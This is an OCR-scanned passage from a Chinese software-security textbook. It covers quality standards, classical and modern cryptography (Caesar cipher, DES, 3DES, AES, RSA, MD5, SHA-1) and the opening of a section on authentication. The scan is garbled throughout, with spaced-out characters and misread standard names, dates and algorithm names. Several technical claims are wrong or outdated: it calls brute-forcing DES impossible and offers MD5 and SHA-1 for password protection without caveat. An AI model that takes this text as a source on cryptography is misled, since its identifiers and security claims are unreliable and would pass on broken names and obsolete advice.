保护 软件 私密 信息 免 受 攻 击 者 窃取 是 软件 安全 一 个 非常 重要 的 方面 。 如 果 攻 击 者 破解 一 
个 软件 系统 并 盗 取 客户 的 私密 信息 ， 用 户 会 对 这 个 软件 系统 失去 信心 。 攻 击 者 也 可 以 攻击 敏 
感 系统 信 息 ， 从 而 提供 给 其 他 攻击 者 。 防 止 攻击 者 访问 私密 信息 或 混淆 这 些 信息 可 以 降低 信 
息 泄 漏 的 危险 。 

3. 软件 安全 相关 的 国际 标准 

软件 质量 标准 : ISO 9000 系列 标准 是 ISO 国际 标准 化 组 织 176 技术 委员 会 (TC/176) 制 定 的 国 
际 标 准 ， 其 核心 思想 是 质量 保证 标准 ISO 9001/2/3 和 质量 管理 标准 ISO 90040， 前 者 是 “ 需 方 对 
供 方 要 求 质量 保证 ”的 标准 ， 后 者 是 用 于 “ 供 方 建立 质量 保证 体系 ”的 标准 。ISO 9000 标准 是 为 
制造 硬件 产品 而 制定 的 标准 ，ISO 试图 修改 ISO 9001 用 于 软件 开发 方面 ， 但 效果 不 佳 。 于 是 ， 另 
行 制定 出 9000-3 标准 ， 用 于 软件 开发 、 供 应 及 维护 的 指南 。 我 国 制定 了 CBT 19000 国家 标准 ， 
该 标准 等 同 于 ISO 9000 标准 。 这 两 个 标准 在 内 容 上 基本 上 是 对 应 的 。 

ISO 9000-3 标准 是 ISO 质量 管理 和 质量 保证 标准 在 软件 开发 、 供 应 和 维护 中 的 使 用 指南 ， 
并 不 作为 质量 体系 注册 、 认 证 时 的 评估 准则 ， 主 要 考虑 软件 行业 的 特殊 性 制定 的 标准 ， 其 核 
心 内 容 包括 : 合同 评审 、 需 方 需 求 规格 说 明 、 开 发 计划 、 质 量 计划 、 设 计 和 实现 、 测 试 和 确 
认 、 验 收 、 复 制 、 交 付 和 安装 维护 。 

ISO/EC 9000-3 是 国际 标准 化 组 织 国际 电工 技术 委员 会 用 于 软件 产品 和 相关 服务 的 质量 
管理 标准 (Quality Management Standard). 新 的 ISO IEC 9000-3 2004 标准 于 2004 4E 2 H 15 H 
公布 ， 原 有 的 ISO 9000-3 1997 软件 标准 作废 。 

ISO/IEC 9000-32004 是 软件 工程 标准 ISO 9001 2000 的 指导 标准 。 它 提供 对 应 用 ISO 9001 
2000 标准 的 指导 ， 例 如 获得 、 供 应 、 开 发 、 操 作 和 维护 计算 机 软件 相关 支持 服务 。 它 并 没有 
增加 或 改变 ISO 9001 2000 的 要 求 ， 应 用 该 标准 对 包括 商业 软件 、 组 织 软件 、 硬 件 嵌 入 软件 
以 及 相关 软件 服务 等 是 合适 的 。 有 些 组 织 可 能 参与 所 有 这 些 行为 ， 有 的 组 织 只 是 参与 某 个 领 
域 。 无 论 哪 种 情况 ， 组 织 的 质量 管理 系统 都 应 该 搜索 所 有 的 软件 相关 以 及 不 相关 的 方面 。 该 
标准 确定 了 应 该 解决 的 一 些 问题 ， 这 些 问 题 独立 于 该 组 织 采用 的 技术 、 生 命 周 期 模型 、 开 发 
过 程 、 行 为 次 序 以 及 组 织 结构 。 软 件 工程 标准 ISO/IEC JTC 1/SC7 通常 作为 补充 和 参考 ， 这 
些 标准 包括 ISO/IFX 12207, ISO/IEC TR 9126, ISO/IEC 14598, ISO/IEC 15939 Fl ISO/IEC TR 
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15504。 另 外 ， 早 在 1996 年 ， 美 国 国防 部 颁发 了 安全 编程 标准 : MIL-STD482B 系统 安全 编 
程 需求 (System Safety Program Requirements). 


L5 ”本章 小 结 


本 章 首先 简要 介绍 了 软件 安全 包含 的 两 层 含义 safety 和 security, 然后 在 此 基础 上 对 本 书 
重点 软件 安全 (security) 进 行 曾 述 。 本 节 重 点 在 于 安全 漏洞 的 危害 ， 软 件 安全 开发 与 软件 生命 
周期 的 对 应 关系 ， 软 件 测试 技术 。 简 单 介绍 了 软件 安全 相关 的 国际 规则 和 标准 。 
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本 章 导读 

本 章 将 介绍 软件 安全 技术 的 知识 。 密 码 学 部 分 介绍 常见 加 密 方法 、 原 理 。 认 证 技术 部 分 
介绍 当前 主流 的 认证 及 身份 验证 技术 。 访问 控 制 技术 部 分 介绍 访问 控制 的 概念 和 主流 操作 系 
统 的 访问 控制 技术 。 最 后 讲解 安全 保障 和 网 络 安全 方面 的 知识 。 

应 掌握 的 知识 要 点 : 

。 “密码 学 的 概念 

。 加 密 方法 与 技术 

。 身份 验证 技术 

。 访问 控制 技术 

。 安全 保障 

。 防火 墙 技术 

。 入 侵 检测 与 安全 扫 模 

。 安全 配置 管理 


2.1 密码 学 


2.1.1 ”密码 学 概述 


密码 学 是 研究 如 何 隐 和 密 地 传递 信息 的 学 科 。 在 现代 特别 指 对 信息 以 及 其 传输 的 数学 性 研 
究 ， 常 被 认为 是 数学 和 计算 机 科学 的 分 支 ， 和 信息 论 也 密切 相关 。 密 码 学 的 首要 目的 是 隐藏 
信息 的 涵义 ， 并 不 是 隐藏 信息 的 存在 。 密 码 学 也 促进 了 计算 机 科学 ， 特 别 是 在 于 电脑 与 网 络 
安全 所 使 用 的 技术 ， 如 访问 控制 与 信息 的 机 密 性 。 密 码 学 已 被 应 用 在 日 常生 活 : 包括 自动 柜 
员 机 的 芯片 卡 、 电 脑 使 用 者 存 取 密 码 、 电 子 商 务 等 。 

密码 是 通信 双方 按 约 定 的 法 则 进行 信息 特殊 变换 的 一 种 重要 保密 手段 。 依 照 这 些 法 则 ， 
变 明文 为 密 文 ， 称 为 加 密 变 换 ， 变 密 文 为 明文 ， 称 为 脱 密 变 换 。 密 码 在 早期 仅 对 文字 或 数码 
进行 加 、 脱 密 变 换 ， 随 着 通信 技术 的 发 展 ， 对 语音 、 图 像 、 数 据 等 都 可 实施 加 、 脱 密 变换 。 

加 密 过 程 依靠 的 是 加 密 算法 。 最 早期 的 “置换 ”和 “替代 ”算法 就 是 很 好 的 例子 。 

置换 : 就 是 将 字符 顺序 重新 排列 ; 比如 :“make it better” 可 以 将 字符 两 两 前 后 置换 “amek 
ti ebttre". 


替代 : 有 系统 地 将 一 组 字符 换 成 其 他 字符 或 符号 ;比如 我 们 约定 表 2-1 中 的 替换 规则 。 
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表 2-1 替换 规则 

原 字符 a 工 k m r t 
替换 字符 c L w z d p 

那么 上 文中 的 “make itbetter” 将 变 为 “zcwg Ip ngppgd” . 
此 可 见 ， 加 密 技术 是 密码 学 的 核心 。 在 具体 介绍 当今 加 密 算法 前 ， 我 们 需要 了 解 一 些 
基本 技术 术语 : 

* ”明文 (plaintext): 需要 被 保护 的 消息 ; 

© 密 文 (ciphertexb: 将 明文 利用 一 定 算法 进行 改变 后 的 消息 ; 

。 加 密 (encryption): 将 明文 利用 一 定 算法 转换 成 密 文 的 过 程 ; 

。 解密 (decryption): 由 密 文 恢复 出 明文 的 过 程 ; 

。 攻击 者 ;通过 各 种 办 法 ， 窃 取 机 密 信息 来 达到 非法 目的 ; 

。 被 动 攻击 (passive attack): 获取 密 文 , 目的 是 经 过 分 析 得 到 明文 , 这 是 一 类 攻击 的 总 称 ; 

。 主动 攻击 (active attack): 非法 入 侵 者 采用 自 改 、 伪 造 等 手段 向 系统 注入 假 消 息 等 ， 

这 也 是 一 类 攻击 的 总 称 ; 

。 加 密 算 法 : 对 明文 进行 加 密 时 采用 的 算法 ; 

。 解密 算法 : 对 密 文 进行 解密 时 采用 的 算法 。 

通常 加 密 体系 中 最 核心 的 内 容 是 加 密 算法 和 密 钥 ; 加 密 算 法 通常 公开 ， 加 密 系统 的 安全 
性 取决 于 密 钥 的 隐蔽 性 。 密 钥 包 括 加密 密 钥 (encryption key) 和 解密 密 钥 (decryption key)。 由 于 
加 密 算法 和 解密 算法 的 操作 通常 是 在 一 组 输入 数据 的 控制 下 进行 的 ， 这 组 输入 数据 就 称 为 密 
钥 ， 在 加 密 时 使 用 的 密 钥 为 加 密 密 钥 ， 解 密 时 使 用 的 密 钥 为 解密 密 钥 。 

在 密码 系统 中 ， 有 两 大 要 素 : 密码 算法 (加 密 算法 和 解密 算法 ) 和 密 钥 。 两 者 之 间 具 有 紧 
密 的 联系 。 以 最 简单 的 “ 恺 撤 加 密 法 ”为 例 : 《高 卢 战 记 》 中 描述 ， 恺 撤 大 带 曾 使 用 密码 来 传 
递 信息 ， 即 所 谓 的 “ 恺 撤 密码 ” 它 是 一 种 奉 代 密码 ， 通 过 将 字母 按 顺 序 推 后 3 位 起 到 加 密 作 
用 。 如 将 字母 A 换 作 字母 D， 将 字母 B 换 作 字母 E，X、Y、Z 字母 分 别 又 变 为 A、B、C 字 
母 。 如 “China” 可 以 变 为 “Fklqd” 解密 过 程 相 反 。 在 这 个 简单 的 加 密 方法 中 ,“ 向 右 移 位 ” 
可 以 理解 为 加 密 算 法 ;“3” 可 以 理解 为 加 密 密 钥 。 对 于 解密 过 程 ,“ 向 左 移 位 ” 可 以 理解 为 
解密 算法 ;“3” 可 以 理解 为 解密 密 钥 。 显 然 ， 密 钥 是 一 种 参数 ， 它 是 在 明文 转换 为 密 文 或 将 
密 文 转换 为 明文 的 算法 中 输入 的 数据 。 恺 撤 加 密 法 的 安全 性 来 源 于 两 个 方面 ， 对 密码 算法 本 
身 的 保密 ， 对 密 钥 的 保密 。 

加 密 之 所 以 安全 ， 是 因为 其 密 钥 的 保密 ， 并 非 加 密 算 法 本 身 的 保密 。 因 此 ， 密 码 算法 一 
般 公 开 ， 而 将 密 钥 进 行 保密 。 如 果 攻 击 者 要 通过 密 文 得 到 明文 ， 除 非 对 每 一 个 可 能 的 密 钥 进 
行 穷 举 性 测试 。 从 后 面 的 篇 幅 将 可 以 看 出 ， 流 行 的 一 些 加 密 解 密 算法 一 般 是 完全 公开 的 。 攻 
击 者 如 果 取 得 已 加 密 的 数据 ， 即 使 得 知 加 密 算法 ， 若 没有 密 钥 ， 也 无 法 进行 解密 。 

随 着 加 密 技术 的 不 断 发 展 ， 它 已 经 成 为 计算 机 领域 的 尖端 学 科 ， 主 要 涉及 信息 论 、 概 率 
论 、 数 论 、 计 算 复杂 性 理论 、 近 世代 数 、 离 散 数学 、 代 数 几 何 学 和 数字 逻辑 等 多 种 学 科 。 目 
前 主流 加 密 技 术 包 括 : 对 称 加 密 、 非 对 称 加 密 和 单 向 加 密 三 类 。 由 于 它们 的 特点 不 同 ， 在 不 
同系 统 中 具有 不 同 的 应 用 范围 ,各 类 算法 中 都 有 一 些 代表 性 算法 。 如 对 称 加 密 体系 中 的 DEIS, 
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3DES. AES 算法 ， 非 对 称 加 密 体 系 中 的 RSA、DSA 算法 ， 单 向 加 密 中 的 HASH 算法 等 。 
2.1.2 ”对 称 加 密 

对 称 加 密 算法 应 用 较 早 ， 技 术 较 成 熟 。 过 程 如 下 : 发 送 方 对 明文 用 加 密 密 钥 和 加 密 算法 
进行 加 密 处 理 ， 变 成 密 文 ， 连 同 密 钥 一 起 ， 发 送 给 接收 方 ， 接 收 方 收 到 密 文 后 ， 使 用 发 送 方 
的 加 密 密 钥 及 相同 算法 的 逆 算 法 对 密 文 解密 ， 恢 复 为 明文 。 例 如 ，A 公司 要 给 B 公司 发 送 一 
封 标书 ， 出 于 保密 考虑 采用 对 称 加 密 技术 进行 发 送 ， 如 图 2-1 所 示 : 


公司 A 公司 B 


HIS... RQWIR44647EDED&&@#H#DADYty 


图 2-1 对 称 加密 示 例 图 


可 以 看 出 ， 双 方 使 用 的 密 钥 相同 ， 要 求解 密 方 事先 必须 知道 对 方 使 用 的 加 密 密 钥 。 其 算 
法 一 般 公开 ， 优 势 是 计算 量 较 小 、 加 密 速度 较 快 、 效 率 较 高 。 不 足 之 处 是 ， 通 信 双 方 使 用 同 
样 的 密 钥 ， 密 钥 在 传送 的 过 程 中 ， 可 能 被 第 三 方 获 取 ， 安 全 性 得 不 到 保证 。 当 然 ， 为 安全 起 
见 ， 用 户 每 次 使 用 该 算法 ， 可 以 更 换 密 钥 ， 但 是 原来 通信 的 密 钥 也 不 能 马上 删除 ， 但 是 这 样 
使 得 双方 所 拥有 的 密 钥 数 量 很 大 ， 对 于 双方 来 说 ， 密 钥 管 理 较为 困难 。 

DES 是 数据 加 密 标准 (Data Encryption Standard) 的 简称 ， 来 源 于 IBM 的 研究 工作 ， 并 在 
1977 年 被 美国 政府 正式 采纳 。 这 种 密 钥 系统 使 用 得 非常 广泛 ， 最 初 开 发 DES 是 嵌入 硬件 中 ， 
后 来 在 其 他 领域 得 到 了 发 展 。 在 金融 数据 安全 保护 等 领域 ， DES 发 挥 了 巨大 作用 。 

DES 算法 的 基本 思想 如 下 : 首先 确定 一 个 64 位 的 初始 密 钥 K( 也 称 为 主 密 钥 )， 在 这 64 
位 中 ， 实 际 密 钥 只 有 56 位 ， 另 有 8 位 是 奇偶 校 验 位 ， 分 布 于 64 位 密 钥 中 ,每 8 位 中 有 1 位 
奇偶 检验 位 。 要 对 DES 进行 攻击 ， 一 般 只 能 使 用 穷 举 密 钥 搜 索 方法 ， 即 重复 尝试 各 种 密 钥 ， 
直到 找到 符合 的 为 止 ， 这 种 做 法 无 法 实现 。 

3DES， 即 三 重 DES， 是 DES 的 加 强 版 ， 也 是 DES 的 一 种 更 安全 的 变形 。 在 原理 上 ， 它 
使 用 3 个 56 位 ( 共 168 位 ) 的 密 钥 对 数据 进行 三 次 加 密 ， 和 DES 相 比 ， 安 全 性 得 到 了 较 大 提 
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高 。 实 际 上 ，3DES 是 一 个 过 渡 的 加 密 算法 。1999 E, NIST 将 3DES 指定 为 DES 向 AES 过 
渡 的 加 密 标准 。3DES 以 DES 为 基本 模块 ， 通 过 组 合 分 组 方法 设计 出 分 组 加 密 算法 。 若 三 个 
密 钥 互 不 相同 ， 本 质 上 就 相当 于 用 一 个 长 为 168 位 的 密 钥 进行 加 密 ， 大 大 加 强 了 数据 的 安 
全 性 。 若 数据 对 安全 性 要 求 不 高 ， 可 让 其 中 的 两 个 密 钥 相等 ， 这 样 ， 密 钥 的 有 效 长 度 也 有 
112 位 。 

AES 在 密码 学 中 是 高 级 加 密 标准 (Advanced Encryption Standard) 的 缩写 ， 该 标准 是 NIST 
推出 则 在 取代 DES 的 21 世纪 的 加 密 标准 ， 已 被 多 方 分 析 且 广 为 使 用 ， 在 对 称 加 密 系 统 中 成 
为 最 流行 的 算法 之 一 。AES 算法 已 被 广泛 应 用 于 各 个 领域 。AES 设计 的 密 钥 长 度 有 128 位 、 
192 位 、256 位 三 种 ， 比 DES 的 56 密 钥 安全 性 更 强 。 


2.1.3“” 非 对 称 加 密 


与 对 称 加 密 算 法 不 同 ， 非 对 称 加 密 算法 需要 两 个 密 钥 : 公开 密 钥 (public key) 和 私有 密 钥 
(private key)。 每 个 人 都 可 以 生成 这 两 个 密 钥 ， 其 中 ， 公 开 密 钥 对 外 公开 (可 以 通过 网 上 发 布 ， 
也 可 以 传输 给 通信 的 对 方 )， 私 有 密 钥 不 公开 。 对 于 同一 段 数据 ,利用 非 对 称 加 密 算法 具有 如 
下 性 质 ， 如 果 用 公开 密 钥 对 数据 进行 加 密 ， 那 么 具有 用 对 应 的 私有 密 钥 才 能 对 其 解密 ;如果 
用 私有 密 钥 对 数据 进行 加 密 ， 那 么 只 有 用 对 应 的 公开 密 钥 才 能 对 其 解密 。 

非 对 称 加 密 算法 的 基本 过 程 是 ; 首先 ， 通 信 前 ， 接 收 方 随机 生成 一 对 公开 密 钥 和 私有 密 
钥 ， 将 公开 密 钥 公开 给 发 送 方 ， 自 己 保留 私有 密 钥 ， 然 后 发 送 方 利用 接收 方 的 公开 密 钥 加 密 
明文 ， 使 其 变 为 密 文 ， 最 后 接收 方 收 到 密 文 后 ， 使 用 自己 的 私有 密 钥 解密 密 文 ， 获 得 明文 。 
上 述 例子 中 ， 如 果 公 司 A 和 公司 B 采用 非 对 称 加 密 方式 进行 标书 的 传送 ， 则 分 为 以 下 几 步 : 

(1) 公司 B 生成 公 钥 和 密 钥 ; 

) 公司 B 将 公 钥 发 送 给 公司 A， 自 己 保留 密 钥 ; 
) 公司 A 用 公 钥 对 标书 进行 加 密 ; 
) 公司 A 将 加 密 后 的 标书 发 送 给 公司 B; 

(5) 公司 B 用 保留 的 密 钥 对 加 密 的 标书 进行 解密 ， 获 得 标书 原文 。 

与 对 称 加 密 算法 相 比 ， 非 对 称 加 密 算法 的 保密 性 比较 好 ， 在 通信 过 程 中 ， 只 有 公开 密 钥 
在 网 络 上 传输 ， 即 使 公开 密 钥 被 攻击 者 获取 ， 也 没有 用 ， 因 此 ， 基 本 不 必 担心 密 钥 在 网 上 被 
截获 而 引起 安全 问题 。 但 该 加 密 体系 中 ， 加 密 和 解密 花费 时 间 较 长 、 速 度 较 慢 ,一 般 情况 下 ， 
不 适合 对 大 量 数 据 进 行 加 密 ， 只 适用 对 少量 数据 进行 加 密 。 

目前 ， 在 非 对 称 密码 体系 中 ， 使 用 得 比较 广泛 的 非 对 称 加 密 算 法 有 RSA 等 。RSA 算法 
出 现 于 20 世纪 70 年 代 ， 既 能 用 于 数据 加 密 ， 也 能 用 于 数字 签名 。 由 于 其 易于 理解 和 容易 操 
作 而 广泛 流行 。 该 算法 由 了 Ron Rivest, Adi Shamir fll Leonard Adleman 发 明 ， 也 就 以 三 人 的 名 
字 命 名 。 针 对 RSA 的 研究 比较 广泛 ， 在 使 用 过 程 中 ， 经历 了 各 种 攻击 的 考验 ， 逐渐 被 普遍 认 
为 是 目前 最 优秀 的 公 钥 方案 之 一 。 

2.1.4 HASH 加 密 


另 一 类 算法 是 单 向 加 密 算法 。 该 算法 在 加 密 过 程 中 ， 输 入 明文 后 由 系统 直接 经 过 加 密 算 
法 处 理 ， 得 到 密 文 ， 不 需要 使 用 密 钥 。 既 然 没 有 密 钥 ， 那 就 无 法 通过 密 文 恢复 为 明文 ， 即 单 
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向 加 密 是 不 可 逆 的 。 

既然 单 向 加 密 是 不 可 逆 的 ， 那 么 这 种 方法 有 什么 应 用 呢 ? 它 主要 用 于 进行 某 些 信息 的 鉴 
别 。 在 鉴别 时 ， 重 新 输入 明文 ， 并 经 过 同样 的 加 密 算 法 进行 加 密 处 理 ， 得 到 密 文 ， 然 后 看 这 
个 密 文 是 否 和 以 前 得 到 的 密 文 相同 ， 从 而 判断 输入 的 明文 是 否 和 以 前 的 明文 相同 。HASH( 哈 
希 ) 加 密 算法 是 单 向 加 密 中 常用 到 的 加 密 技术 。 

Hash， 一 般 翻 译 为 “ 散 列 ”， 也 有 直接 音译 为 “ 哈 希 ”的 ， 就 是 把 任意 长 度 的 输入 (又 称 
为 预 映射 ，pre-image)， 通 过 散 列 算法 ， 变 换 成 固定 长 度 的 输出 ， 该 输出 就 是 散 列 值 。 数 学 公 
式 表达 如 下 : 

h-H(M) ,其 中 H() 一 一 单 向 散 列 函数 ，M 一 一 任意 长 度 明 文 , bh 一 一 固定 长 度 散 列 值 。 

这 种 转换 是 一 种 压缩 映射 ， 也 就 是 说 ， 散 列 值 的 空间 通常 远 小 于 输入 的 空间 ， 不 同 的 输 
入 可 能 会 散 列 成 相同 的 输出 ， 而 不 可 能 从 散 列 值 来 唯一 地 确定 输入 值 。 举 例如 下 : 

输入 make it matter 通过 哈 希 加 密 ， 可 能 得 到 的 输出 为 “mim”;， 那么 我 们 将 mim 进行 逆 
向 运算 的 话 ， 可 能 得 到 结果 是 metal injection molding( 金 属 注射 成 形 )， 不 是 原始 输入 。 

HASH 加 密 算 法 在 信息 安全 领域 中 的 应 用 ， 有 具备 以 下 关键 特性 : 

。 单 向 性 : 从 预 映射 ， 能 够 简单 迅速 地 得 到 散 列 值 ， 而 在 计算 上 不 可 能 构造 一 个 预 映 

射 ， 使 其 散 列 结果 等 于 某 个 特定 的 散 列 值 ， 即 构造 相应 的 M=H-1(h) 不 可 行 。 这 样 ， 
散 列 值 就 能 在 统计 上 唯一 地 表征 输入 值 ， 因 此 ， 密 码 学 上 的 Hash 又 被 称 为 “消息 摘 
要 (message digest)”， 就 是 要 求 能 方便 地 将 “消息 ”进行 “摘要 ”， 但 在 “摘要 ”中 无 
法 得 到 比 “ 摘 要 ”本 身 更 多 的 关于 “消息 ”的 信息 。 

e 抗 冲突 性 ， 在 统计 上 无 法 产生 2 个 散 列 值 相同 的 预 映 射 。 给 定 M， 计 算 上 无 法 找到 
M， 满 足 HIMD=HGM)， 此 谓 弱 抗 冲突 性 ， 计 算 上 也 难以 寻找 一 对 任意 的 M 和 M'， 
使 满足 HMHM’), 此 谓 强 抗 冲突 性 。 要求“ 强 抗 冲突 性 ”主要 是 为 了 防范 所 谓 “ 生 
日 攻击 (birthday attack)”， 在 一 个 10 人 的 团体 中 ， 你 能 找到 和 你 生日 相同 的 人 的 概 
率 是 2.4%， 而 在 同一 团体 中 ， 有 2 人 生日 相同 的 概率 是 11.7%。 与 此 类 似 ， 当 预 映 
射 的 空间 很 大 的 情况 下 , 算法 必须 有 足够 的 强度 来 保证 不 能 轻易 找到 “相同 生日 ” 
的 人 。 

。 映射 分 布 均匀 性 和 差分 分 布 均匀 性 : 散 列 结果 中 , 为 0 的 bit 和 为 1 的 bit, 其 总 数 应 
该 大 致 相等 ， 输 入 中 一 个 bit 的 变化 ， 散 列 结果 中 将 有 一 半 以 上 的 bit 改变 ， 这 又 称 
为 “雪崩 效应 (avalanche effect)”; 要 实现 使 散 列 结果 中 出 现 Ibit 的 变化 ， 则 输入 中 
至 少 有 一 半 以 上 的 bit 必须 发 生变 化 。 其 实质 是 必须 使 输入 中 每 一 个 bit 的 信息 ， 尽 
量 均 匀 地 反映 到 输出 的 每 一 个 bit 上 去 ; 输出 中 的 每 一 个 bit， 都 是 输入 中 尽 可 能 多 
bit 的 信息 一 起 作用 的 结果 。 

从 上 述 特 性 可 知 该 方法 计算 复杂 ， 通 常 只 在 数据 量 不 大 的 情形 下 使 用 ， 如 计算 机 系统 口 
令 保护 措施 中 , 这 种 加 密 算 法 就 得 到 了 广泛 应 用 。MD5 和 SHA1 可 以 说 是 目前 应 用 最 广泛 的 
Hash 算法 。 

。 MD5 的 全 称 是 Message Digest Algorithm 5( 消 息 摘要 算法 5)， 最 初 的 目标 是 用 于 确保 

信息 传输 过 程 中 的 完整 一 致 性 . MDS 算法 由 MD2 和 MD4 发 展 而 来 , 其 基本 思想 是 : 
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将 大 容量 信息 变换 成 一 个 定 长 的 大 整数 ， 这 个 大 整数 对 这 个 信息 来 说 是 单 向 的 。 一 
般 来 说 ， 这 个 大 整数 称 为 消息 摘要 。MDS5 能 够 获得 随机 长 度 的 信息 ， 然 后 生成 128 
位 的 消息 摘要 。MD5 广泛 用 于 密码 认证 、 软 件 序列 号 等 领域 。 
。 安全 散 列 算法 (SHA, Secure Hash Algorithm) 是 NIST 发 布 的 一 个 标准 算法 ， 一 般 称 为 
SHA-1， 该 算法 也 是 一 种 单 向 加 密 算法 ， 输 入 长 度 不 超过 264 二 进 制 位 的 消息 , 产生 
160 位 的 消息 摘要 输出 。 消 息 验证 码 和 MDS/SHA1 算法 的 不 同 之 处 是 : 在 生成 摘要 
时 ， 发 送 者 和 接收 者 都 拥有 一 个 共同 的 密 钥 。 这 个 密 钥 可 以 是 通过 对 称 密码 体系 生 
成 的 ， 事 先 被 双方 共有 ， 在 生成 消息 验证 码 时 ， 还 必须 有 密 钥 的 参与 。 只 有 同样 的 
密 钥 才能 生成 同样 的 消息 验证 码 。 
单 向 加 密 中 不 存在 密 钥 ,而 对 称 和 非 对 称 加 密 系统 的 安全 工作 依赖 于 加 密 算法 和 密 钥 两 
个 方面 。 一 般 情况 下 ， 加 密 算法 都 是 公开 的 ， 所 以 加 密 系统 的 安全 性 依赖 于 密 钥 的 安全 。 
密 钥 管理 是 一 件 很 复杂 的 事情 ， 从 密 钥 的 生成 到 密 钥 的 销毁 等 各 个 方面 都 需要 考虑 。 主 
要 表现 于 : 密 钥 的 管理 体制 ， 密 钥 的 管理 协议 ， 密 钥 生 成 、 分 配 、 销 毁 等 。 由 于 不 同 的 加 密 
体系 ， 密 钥 生 成 之 后 的 使 用 方法 各 不 相同 。 
解决 这 个 问题 的 方法 一 般 是 : 通过 非 对 称 密码 体系 来 对 对 称 密 钥 进行 管理 (采用 该 方法 的 
-个 原因 是 非 对 称 密码 体系 适合 对 少量 数据 进行 加 密 解 密 )。 有 具体 过 程 如 下 (为 描述 简便 ， 此 
处 只 涉及 密 铀 ， 没 有 涉及 被 加 密 的 数据 信息 ， 实 际 上 ， 被 加 密 的 数据 信息 也 存在 于 通信 过 程 
中 ): 发 送 方 生成 对 称 密 钥 ， 将 其 用 接收 方 的 公开 密 钥 加 密 ， 发 出 ; 接收 方 用 自己 的 私 钥 将 加 
密 后 的 对 称 密 钥 解密 ， 得 到 对 称 密 钥 。 由 于 对 信息 的 每 次 发 送 和 接收 ， 都 对 应 了 唯一 的 对 称 
密 钥 ， 因 此 双方 不 需要 对 密 钥 进 行 维护 。 另 外 ， 即 使 泄露 了 密 钥 ， 攻 击 者 也 无 法 知道 密 钥 的 
内 容 ， 因 为 他 不 知道 接收 方 的 私人 密 钥 ， 无 法 对 对 称 密 钥 进行 解密 。 这 种 方式 使 得 管理 相对 
简单 和 安全 ， 同 时 ， 该 方法 还 解决 了 对 称 密 钥 中 存在 的 密 钥 算 改 问题 。 
非 对 称 加 密 体系 中 的 密 钥 管理 主要 涉及 的 是 公开 密 钥 管 理 。 一 般 情况 下 ， 通 信 双 方 间 可 
以 使 用 数字 证 书 (公开 密 钥 证 书 ) 来 交换 公开 密 钥 。 数 字 证 书 将 在 下 一 节 中 进行 讨论 。 


22 认证 及 身份 验证 技术 


信息 网 络 中 相互 通信 的 两 个 实体 往往 物理 上 相隔 很 远 ， 甚 至 从 未 谋面 ， 那 么 一 个 实体 如 
何 确定 是 否 真 的 在 和 另 一 个 它 所 期 望 的 实体 通信 ? 这 正 是 认证 及 身份 验证 技术 所 要 解决 的 问 
题 。 面 对 恶意 的 主动 入 侵 者 ， 鉴 别 远程 实体 的 身份 是 十 分 困难 的 ， 密 码 学 通常 能 为 认证 及 身 
份 验证 提供 良好 的 安全 保证 。 
2.2.1 身份 与 认证 

身份 是 实体 在 信息 系统 中 的 一 种 表示 , 用 于 区 分 不 同 的 实体 。 实体 指定 唯一 的 身份 表示 。 
认证 就 是 将 某 个 身份 与 某 个 实体 进行 绑 定 。 基 于 网 络 的 认证 机 制 要 求实 体 向 某 个 单一 的 系统 
进行 认证 ， 这 个 系统 可 以 是 本 地 的 也 可 以 是 远程 的 。 比 如 ， 我 们 登录 个 人 计算 机 操作 系统 时 
输入 的 用 户 名 和 密码 , 就 是 本 地 认证 ; 我 们 打开 登录 邮箱 的 Web 页 面 时 输入 的 用 户 名 和 密码 ， 
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就 是 远程 认证 。 认 证 技术 的 共性 是 对 某 些 参数 的 有 效 性 进行 检验 ， 即 检验 这 些 参数 是 否 满足 
某 种 预先 确定 的 关系 。 身 份 验证 是 应 用 系统 安全 的 第 一 道 关口 ， 是 所 有 安全 的 基础 。 

在 信息 安全 系统 中 , 某 个 身份 就 对 应 某 个 用 户 。 不 同 的 身份 在 系统 中 对 应 着 不 同 的 权限 。 
比如 ，Windows 系统 中 ， 常 见 的 用 户 分 为 系统 管理 员 和 普通 用 户 。 这 两 类 用 户 拥有 不 同 的 权 
限 , 系统 管理 员 可 以 修改 系统 设置 ; 普通 用 户 仅 可 在 系统 管理 员 的 授权 范围 内 执行 相关 权限 。 

身份 认证 是 向 信息 安全 系统 表明 某 个 身份 的 过 程 ， 是 通过 将 证 据 与 实体 身份 绑 定 来 实现 
的 。 证 据 与 身份 之 间 是 一 一 对 应 的 关系 。 双 方 通信 过 程 中 ， 一 方 实体 向 另 一 方 实体 提供 证 据 
证 明 自己 的 身份 ， 另 一 方 通过 相应 机 制 来 验证 证 据 ， 以 确定 该 实体 是 否 与 证 据 所 宣称 的 身份 
-=g 

针对 不 同 的 身份 认证 场景 ， 目 前 采用 的 认证 技术 包括 : 数字 认证 、 生 物 认 证 、 微 控制 器 
认证 等 。 

222 ”数字 认证 


网 络 购物 已 经 融入 我 们 的 日 常生 活 ， 使 我 们 足 不 出 户 就 可 以 购买 心仪 的 商品 。 我 们 现在 
来 设想 一 下 这 样 一 个 场景 : 网 络 卖家 A， 网 络 买 家 B。B 向 A 下 了 一 份 订单 ， 需 要 购买 A 某 
件 商品 ， 操 作 流 程 如 下 : 

(1) B 用 个 人 账户 信息 登录 网 站 ; 

Q) B 选择 A 的 某 件 商品 ， 形 成 订单 ; 

(3) A 确认 B 的 订单 是 否 有 效 ; 

(4) B 付款 后 ，A 向 B 发 货 ; 

(5) B 确认 收 货 ， 完 成 该 订单 。 

那么 我 们 来 分 析 一 下 ， 整 个 交易 过 程 涉及 的 一 些 风险 问题 : 

1) B 的 个 人 账户 信息 安全 ; 

2) A 的 商品 信息 全 面 ; 

3) B 的 订单 信息 全 面 ，A 不 能 否认 B 的 有 效 订单 ; 

4) B 的 支付 信息 必须 安全 ; 

5) 整个 交易 过 程 只 有 A 和 了 B 知道 ， 不 能 让 第 三 方 在 未 授权 的 情况 下 获得 。 

结合 上 面 的 信息 可 以 看 出 ， 我 们 的 网 络 交易 平台 必须 具备 以 下 几 个 安全 条 件 : 

1) 信息 保密 性 ， 所 有 交易 信息 ， 包 括 个 人 账户 信息 、 银 行 卡 信息 等 必须 保密 。 

2) 交易 者 身份 的 确定 性 : 买 家 和 卖家 都 需要 确保 对 方 身份 的 合法 性 。 

3) 不 可 和 否认 性 : 订单 一 旦 形成 ， 所 有 交易 行为 不 可 否认 。 

4) 不 可 修改 性 : 对 形成 的 订单 不 可 做 修改 。 

如 何 满足 上 述 的 安全 条 件 ， 规 避 交 易 风 险 ? 国际 上 目前 通用 的 技术 方式 就 是 建立 安全 证 
